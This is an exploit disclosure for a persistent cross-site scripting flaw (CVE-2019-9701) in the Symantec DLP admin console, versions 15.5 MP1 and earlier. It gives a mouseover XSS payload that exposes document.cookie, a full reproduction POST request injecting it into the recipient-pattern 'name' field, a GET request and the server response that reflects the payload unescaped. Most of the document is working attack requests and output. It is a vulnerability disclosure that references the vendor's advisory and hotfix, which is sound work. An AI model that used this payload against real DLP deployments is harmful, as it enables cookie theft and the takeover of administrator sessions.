# Exploit Title: Persistent XSS on Symantec DLP <= 15.5 MP1
# Date: 2019-06-21
# Exploit Author: Chapman Schleiss
# Vendor Homepage: https://www.symantec.com/
# Software Link: https://support.symantec.com/us/en/mysymantec.html
# Version: <= 15.5 MP1
# CVE : 2019-9701
# Advisory-URL: https://support.symantec.com/us/en/article.SYMSA1484.html
# Hot Fix: https://support.symantec.com/us/en/article.ALERT2664.html
Description
---------------
Persistent XSS via 'name' param at
/ProtectManager/enforce/admin/senderrecipientpatterns/list
Payload: ' oNmouseover=prompt(document.domain,document.cookie) )
Browser: Firefox 64, IE 11
Date Observed: 15 January 2019
Reproduction POST
-----------------
POST
/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update
HTTP/1.1
Host: [snip].com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://
[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
Content-Type: application/x-www-form-urlencoded
Content-Length: 558
Connection: close
name=%27+oNmouseover%3Dprompt%28document.domain%2Cdocument.cookie%29+%29&description=some_text&userPatterns=test%
40test.com&ipAddresses=192.168.1.1&urlDomains=mail.company.com
&id=41&version=30
Reproduction GET
----------------
GET /ProtectManager/enforce/admin/senderrecipientpatterns/list HTTP/1.1
Host: [snip].com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://
[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
Connection: close
Reproduction Response
---------------------
<div id="messages-section">
<div class="message-pane alert-pane">
<div class="alert-message">
<div class="yui3-g message-pane-scroll">
<div class="yui3-u-1-24 message-icon">
<img src="/ProtectManager/graphics/success_icon.gif" alt="Success" width="19" height="19" />
</div>
<div class="yui3-u-11-12 wrapping-text">
<div id="web-status-message-163" class="message-content"> Recipient pattern '' oNmouseover=prompt(document.domain,document.cookie) )' was saved successfully. </div>
</div>
<div class="yui3-u-1-24">
<div class="message-pane-actions">
<a href="#" class="message-back-to-element hidden action-icon">
<img src="/ProtectManager/graphics/general/scroll_back_16.png" alt="" title="Show affected object"/>
</a>
<a href="#" class="message-pane-close action-icon">
<img src="/ProtectManager/graphics/general/cancel_blue_16.png" alt="" title="Close message bar"/>
</a>
</div>
</div>
</div>
</div>
</div>
</div>